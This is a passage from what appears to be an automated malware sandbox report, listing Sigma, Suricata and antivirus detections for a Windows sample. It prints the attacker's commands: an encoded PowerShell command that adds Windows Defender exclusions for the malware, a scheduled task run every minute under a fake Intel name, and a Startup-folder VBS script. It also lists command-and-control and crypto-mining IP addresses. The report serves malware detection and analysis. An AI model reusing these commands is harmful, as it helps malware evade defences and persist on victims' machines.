QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe, ParentProcessId: 1260, ParentProcessName: sUSFJjY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZ
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 2896, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 2164, ProcessName: schtasks.exe
                            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , ProcessId: 4412, ProcessName: wscript.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe, ParentProcessId: 1260, ParentProcessName: sUSFJjY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZ

                            Data Obfuscation

                            barindex
                            Sigma detected: Drops script at startup location
                            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe, ProcessId: 1260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:31.559663+010020362892Crypto Currency Mining Activity Detected192.168.2.4602181.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:00:05.553095+010020283713Unknown Traffic192.168.2.450174104.21.79.7443TCP
                            2024-12-16T01:01:42.214069+010020283713Unknown Traffic192.168.2.449854104.21.79.7443TCP
                            2024-12-16T01:01:48.229490+010020283713Unknown Traffic192.168.2.449866104.21.79.7443TCP
                            2024-12-16T01:01:53.116155+010020283713Unknown Traffic192.168.2.449878104.21.79.7443TCP
                            2024-12-16T01:02:00.256872+010020283713Unknown Traffic192.168.2.449895104.21.79.7443TCP
                            2024-12-16T01:02:05.868810+010020283713Unknown Traffic192.168.2.449907104.21.79.7443TCP
                            2024-12-16T01:02:09.778921+010020283713Unknown Traffic192.168.2.449920104.21.79.7443TCP
                            2024-12-16T01:02:15.899234+010020283713Unknown Traffic192.168.2.449939104.21.79.7443TCP
                            2024-12-16T01:02:21.272633+010020283713Unknown Traffic192.168.2.449953104.21.50.161443TCP
                            2024-12-16T01:02:21.421362+010020283713Unknown Traffic192.168.2.449957104.21.79.7443TCP
                            2024-12-16T01:02:24.074856+010020283713Unknown Traffic192.168.2.449961104.21.50.161443TCP
                            2024-12-16T01:02:34.609498+010020283713Unknown Traffic192.168.2.449987104.21.50.161443TCP
                            2024-12-16T01:02:37.663059+010020283713Unknown Traffic192.168.2.449989104.21.50.161443TCP
                            2024-12-16T01:02:42.583015+010020283713Unknown Traffic192.168.2.449998104.21.50.161443TCP
                            2024-12-16T01:02:49.997831+010020283713Unknown Traffic192.168.2.450018104.21.50.161443TCP
                            2024-12-16T01:03:00.453224+010020283713Unknown Traffic192.168.2.450039104.21.50.161443TCP
                            2024-12-16T01:03:06.049895+010020283713Unknown Traffic192.168.2.450049104.21.50.161443TCP
                            2024-12-16T01:03:06.739049+010020283713Unknown Traffic192.168.2.450053104.21.50.161443TCP
                            2024-12-16T01:03:12.398640+010020283713Unknown Traffic192.168.2.450065104.21.50.161443TCP
                            2024-12-16T01:03:22.139362+010020283713Unknown Traffic192.168.2.450086172.67.177.250443TCP
                            2024-12-16T01:03:29.482324+010020283713Unknown Traffic192.168.2.450100104.21.50.161443TCP
                            2024-12-16T01:03:33.210106+010020283713Unknown Traffic192.168.2.450104104.21.50.161443TCP
                            2024-12-16T01:03:38.308914+010020283713Unknown Traffic192.168.2.450112104.21.50.161443TCP
                            2024-12-16T01:03:42.776243+010020283713Unknown Traffic192.168.2.450117104.21.50.161443TCP
                            2024-12-16T01:03:53.697968+010020283713Unknown Traffic192.168.2.450123172.67.177.250443TCP
                            2024-12-16T01:04:00.465063+010020283713Unknown Traffic192.168.2.450129172.67.177.250443TCP
                            2024-12-16T01:04:04.440045+010020283713Unknown Traffic192.168.2.450131172.67.177.250443TCP
                            2024-12-16T01:04:09.054592+010020283713Unknown Traffic192.168.2.450134172.67.177.250443TCP
                            2024-12-16T01:04:09.782778+010020283713Unknown Traffic192.168.2.450136104.21.50.161443TCP
                            2024-12-16T01:04:13.344518+010020283713Unknown Traffic192.168.2.450138172.67.177.250443TCP
                            2024-12-16T01:04:15.112408+010020283713Unknown Traffic192.168.2.450139104.21.50.161443TCP
                            2024-12-16T01:04:27.892302+010020283713Unknown Traffic192.168.2.450145172.67.177.250443TCP
                            2024-12-16T01:04:33.425988+010020283713Unknown Traffic192.168.2.450153172.67.177.250443TCP
                            2024-12-16T01:04:34.109544+010020283713Unknown Traffic192.168.2.450155104.21.79.7443TCP
                            2024-12-16T01:04:45.736837+010020283713Unknown Traffic192.168.2.450168104.21.79.7443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:43.386291+010020546531A Network Trojan was detected192.168.2.449854104.21.79.7443TCP
                            2024-12-16T01:01:48.958360+010020546531A Network Trojan was detected192.168.2.449866104.21.79.7443TCP
                            2024-12-16T01:02:22.301907+010020546531A Network Trojan was detected192.168.2.449953104.21.50.161443TCP
                            2024-12-16T01:02:22.306188+010020546531A Network Trojan was detected192.168.2.449957104.21.79.7443TCP
                            2024-12-16T01:02:24.978820+010020546531A Network Trojan was detected192.168.2.449961104.21.50.161443TCP
                            2024-12-16T01:03:01.666950+010020546531A Network Trojan was detected192.168.2.450039104.21.50.161443TCP
                            2024-12-16T01:03:07.472738+010020546531A Network Trojan was detected192.168.2.450049104.21.50.161443TCP
                            2024-12-16T01:03:13.495944+010020546531A Network Trojan was detected192.168.2.450065104.21.50.161443TCP
                            2024-12-16T01:03:23.227098+010020546531A Network Trojan was detected192.168.2.450086172.67.177.250443TCP
                            2024-12-16T01:03:55.020370+010020546531A Network Trojan was detected192.168.2.450123172.67.177.250443TCP
                            2024-12-16T01:04:16.422850+010020546531A Network Trojan was detected192.168.2.450139104.21.50.161443TCP
                            2024-12-16T01:04:34.492848+010020546531A Network Trojan was detected192.168.2.450153172.67.177.250443TCP
                            2024-12-16T01:04:35.129480+010020546531A Network Trojan was detected192.168.2.450155104.21.79.7443TCP
                            2024-12-16T01:04:46.478746+010020546531A Network Trojan was detected192.168.2.450168104.21.79.7443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:43.386291+010020498361A Network Trojan was detected192.168.2.449854104.21.79.7443TCP
                            2024-12-16T01:02:22.301907+010020498361A Network Trojan was detected192.168.2.449953104.21.50.161443TCP
                            2024-12-16T01:03:01.666950+010020498361A Network Trojan was detected192.168.2.450039104.21.50.161443TCP
                            2024-12-16T01:03:23.227098+010020498361A Network Trojan was detected192.168.2.450086172.67.177.250443TCP
                            2024-12-16T01:04:35.129480+010020498361A Network Trojan was detected192.168.2.450155104.21.79.7443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:48.958360+010020498121A Network Trojan was detected192.168.2.449866104.21.79.7443TCP
                            2024-12-16T01:02:24.978820+010020498121A Network Trojan was detected192.168.2.449961104.21.50.161443TCP
                            2024-12-16T01:03:07.472738+010020498121A Network Trojan was detected192.168.2.450049104.21.50.161443TCP
                            2024-12-16T01:03:55.020370+010020498121A Network Trojan was detected192.168.2.450123172.67.177.250443TCP
                            2024-12-16T01:04:46.478746+010020498121A Network Trojan was detected192.168.2.450168104.21.79.7443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:21.272633+010020582311Domain Observed Used for C2 Detected192.168.2.449953104.21.50.161443TCP
                            2024-12-16T01:02:24.074856+010020582311Domain Observed Used for C2 Detected192.168.2.449961104.21.50.161443TCP
                            2024-12-16T01:02:34.609498+010020582311Domain Observed Used for C2 Detected192.168.2.449987104.21.50.161443TCP
                            2024-12-16T01:02:37.663059+010020582311Domain Observed Used for C2 Detected192.168.2.449989104.21.50.161443TCP
                            2024-12-16T01:02:42.583015+010020582311Domain Observed Used for C2 Detected192.168.2.449998104.21.50.161443TCP
                            2024-12-16T01:02:49.997831+010020582311Domain Observed Used for C2 Detected192.168.2.450018104.21.50.161443TCP
                            2024-12-16T01:03:00.453224+010020582311Domain Observed Used for C2 Detected192.168.2.450039104.21.50.161443TCP
                            2024-12-16T01:03:06.049895+010020582311Domain Observed Used for C2 Detected192.168.2.450049104.21.50.161443TCP
                            2024-12-16T01:03:06.739049+010020582311Domain Observed Used for C2 Detected192.168.2.450053104.21.50.161443TCP
                            2024-12-16T01:03:12.398640+010020582311Domain Observed Used for C2 Detected192.168.2.450065104.21.50.161443TCP
                            2024-12-16T01:03:29.482324+010020582311Domain Observed Used for C2 Detected192.168.2.450100104.21.50.161443TCP
                            2024-12-16T01:03:33.210106+010020582311Domain Observed Used for C2 Detected192.168.2.450104104.21.50.161443TCP
                            2024-12-16T01:03:38.308914+010020582311Domain Observed Used for C2 Detected192.168.2.450112104.21.50.161443TCP
                            2024-12-16T01:03:42.776243+010020582311Domain Observed Used for C2 Detected192.168.2.450117104.21.50.161443TCP
                            2024-12-16T01:04:09.782778+010020582311Domain Observed Used for C2 Detected192.168.2.450136104.21.50.161443TCP
                            2024-12-16T01:04:15.112408+010020582311Domain Observed Used for C2 Detected192.168.2.450139104.21.50.161443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:34.596383+010020542471A Network Trojan was detected154.216.20.243443192.168.2.449828TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:03:16.080592+010020197142Potentially Bad Traffic192.168.2.450073185.215.113.1680TCP
                            2024-12-16T01:04:19.138082+010020197142Potentially Bad Traffic192.168.2.450142185.215.113.1680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:15.041392+010020446961A Network Trojan was detected192.168.2.449782185.215.113.4380TCP
                            2024-12-16T01:01:20.575490+010020446961A Network Trojan was detected192.168.2.449794185.215.113.4380TCP
                            2024-12-16T01:01:33.001691+010020446961A Network Trojan was detected192.168.2.449825185.215.113.4380TCP
                            2024-12-16T01:01:39.823032+010020446961A Network Trojan was detected192.168.2.449846185.215.113.4380TCP
                            2024-12-16T01:01:52.463306+010020446961A Network Trojan was detected192.168.2.449877185.215.113.4380TCP
                            2024-12-16T01:02:06.614888+010020446961A Network Trojan was detected192.168.2.449908185.215.113.4380TCP
                            2024-12-16T01:02:12.913030+010020446961A Network Trojan was detected192.168.2.449927185.215.113.4380TCP
                            2024-12-16T01:02:21.550012+010020446961A Network Trojan was detected192.168.2.449955185.215.113.4380TCP
                            2024-12-16T01:02:31.553463+010020446961A Network Trojan was detected192.168.2.449977185.215.113.4380TCP
                            2024-12-16T01:02:40.869989+010020446961A Network Trojan was detected192.168.2.449996185.215.113.4380TCP
                            2024-12-16T01:02:56.138886+010020446961A Network Trojan was detected192.168.2.450028185.215.113.4380TCP
                            2024-12-16T01:03:09.549098+010020446961A Network Trojan was detected192.168.2.450058185.215.113.4380TCP
                            2024-12-16T01:03:28.754173+010020446961A Network Trojan was detected192.168.2.450094185.215.113.4380TCP
                            2024-12-16T01:04:03.548159+010020446961A Network Trojan was detected192.168.2.450130185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:36.715089+010020446971A Network Trojan was detected192.168.2.449835154.216.20.243443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:04:28.892649+010020543501A Network Trojan was detected192.168.2.450146141.8.192.14180TCP
                            2024-12-16T01:04:31.275511+010020543501A Network Trojan was detected192.168.2.450149141.8.192.14180TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:19.702966+010020582301Domain Observed Used for C2 Detected192.168.2.4616161.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:47.922277+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.449993TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:44.094358+010020442441Malware Command and Control Activity Detected192.168.2.449993185.215.113.20680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:48.252202+010020442461Malware Command and Control Activity Detected192.168.2.449993185.215.113.20680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:53.038685+010020442481Malware Command and Control Activity Detected192.168.2.449993185.215.113.20680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:25.098665+010020442471Malware Command and Control Activity Detected116.203.12.241443192.168.2.449959TCP
                            2024-12-16T01:02:50.254266+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.449993TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:29.449599+010020518311Malware Command and Control Activity Detected116.203.12.241443192.168.2.449967TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:25.098255+010020490871A Network Trojan was detected192.168.2.449959116.203.12.241443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:33.575449+010020510042Crypto Currency Mining Activity Detected192.168.2.449979154.216.20.243443TCP
                            2024-12-16T01:03:35.457368+010020510042Crypto Currency Mining Activity Detected192.168.2.450109154.216.20.243443TCP
                            2024-12-16T01:04:36.328082+010020510042Crypto Currency Mining Activity Detected192.168.2.450156154.216.20.243443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:54.195180+010020480941Malware Command and Control Activity Detected192.168.2.449878104.21.79.7443TCP
                            2024-12-16T01:02:39.274505+010020480941Malware Command and Control Activity Detected192.168.2.449989104.21.50.161443TCP
                            2024-12-16T01:03:44.132165+010020480941Malware Command and Control Activity Detected192.168.2.450117104.21.50.161443TCP
                            2024-12-16T01:04:05.802809+010020480941Malware Command and Control Activity Detected192.168.2.450131172.67.177.250443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:41.431663+010020442431Malware Command and Control Activity Detected192.168.2.449993185.215.113.20680TCP
                            2024-12-16T01:04:20.572387+010020442431Malware Command and Control Activity Detected192.168.2.450141185.215.113.20680TCP
                            2024-12-16T01:04:32.785842+010020442431Malware Command and Control Activity Detected192.168.2.450148185.215.113.20680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:06.506988+010028561471A Network Trojan was detected192.168.2.449758185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:13.706221+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449764TCP
                            2024-12-16T01:03:27.397068+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450077TCP
                            2024-12-16T01:04:02.203061+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450124TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:01:10.957744+010028033053Unknown Traffic192.168.2.44977031.41.244.1180TCP
                            2024-12-16T01:01:16.544686+010028033053Unknown Traffic192.168.2.44978331.41.244.1180TCP
                            2024-12-16T01:01:22.069859+010028033053Unknown Traffic192.168.2.44980031.41.244.1180TCP
                            2024-12-16T01:01:34.557091+010028033053Unknown Traffic192.168.2.44982931.41.244.1180TCP
                            2024-12-16T01:01:41.288207+010028033053Unknown Traffic192.168.2.44984831.41.244.1180TCP
                            2024-12-16T01:01:54.212743+010028033053Unknown Traffic192.168.2.44988431.41.244.1180TCP
                            2024-12-16T01:02:08.099492+010028033053Unknown Traffic192.168.2.44991431.41.244.1180TCP
                            2024-12-16T01:02:14.569336+010028033053Unknown Traffic192.168.2.449933185.215.113.1680TCP
                            2024-12-16T01:02:23.060796+010028033053Unknown Traffic192.168.2.449958185.215.113.1680TCP
                            2024-12-16T01:02:33.940495+010028033053Unknown Traffic192.168.2.449982185.215.113.1680TCP
                            2024-12-16T01:02:44.118239+010028033053Unknown Traffic192.168.2.450002185.215.113.1680TCP
                            2024-12-16T01:02:59.829969+010028033053Unknown Traffic192.168.2.45003831.41.244.1180TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:02:53.710221+010028033043Unknown Traffic192.168.2.449993185.215.113.20680TCP
                            2024-12-16T01:03:23.060525+010028033043Unknown Traffic192.168.2.450062185.215.113.20680TCP
                            2024-12-16T01:03:27.643638+010028033043Unknown Traffic192.168.2.450062185.215.113.20680TCP
                            2024-12-16T01:03:30.670644+010028033043Unknown Traffic192.168.2.450062185.215.113.20680TCP
                            2024-12-16T01:03:34.576840+010028033043Unknown Traffic192.168.2.450062185.215.113.20680TCP
                            2024-12-16T01:03:42.168743+010028033043Unknown Traffic192.168.2.450115185.215.113.20680TCP
                            2024-12-16T01:03:45.200321+010028033043Unknown Traffic192.168.2.450115185.215.113.20680TCP
                            2024-12-16T01:03:58.443813+010028033043Unknown Traffic192.168.2.450127185.215.113.1680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-16T01:04:10.020893+010028438641A Network Trojan was detected192.168.2.450136104.21.50.161443TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: file.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
